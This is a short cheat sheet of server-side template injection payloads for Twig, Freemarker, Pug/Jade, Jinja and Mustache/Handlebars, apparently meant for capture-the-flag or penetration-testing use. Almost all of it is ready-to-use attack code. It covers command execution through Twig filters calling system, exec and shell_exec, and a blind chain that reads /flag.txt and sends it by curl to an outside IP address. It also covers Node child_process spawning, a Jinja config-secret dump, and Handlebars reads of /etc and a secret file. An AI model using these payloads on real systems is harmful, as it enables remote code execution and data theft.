Twig:

{{[0]|reduce('system','whoami')}}
{{['id']|filter('system')}}
{{[0]|reduce('passthru','ls')}}
{{[0]|reduce('exec','ls')}}
{{[0]|reduce('shell_exec','ls')}}

Twig (blind/exfil only):

{% set output %}
{{[0]|reduce('system','cat /flag.txt')}}
{% endset %}
{% set exfil = output| url_encode %}
{{[0]|reduce('system','curl http://192.168.45.214/?exfil=' ~ exfil)}}

Freemarker:

${"freemarker.template.utility.Execute"?new()("whoami")}

Pug/Jade:

- var require = global.process.mainModule.require
= require('child_process').spawnSync('ls',['-la','/tmp']).stdout

Jinja (NOT RCE, just config secrets):

{{config|pprint}}

Mustache and Handlebars (NOT RCE, just file read. First 3 lines is to read directory, subsequently read file):

{{#each (readdir "/etc")}}
    {{this}}
{{/each}}

{{read "/secret/flag.txt"}}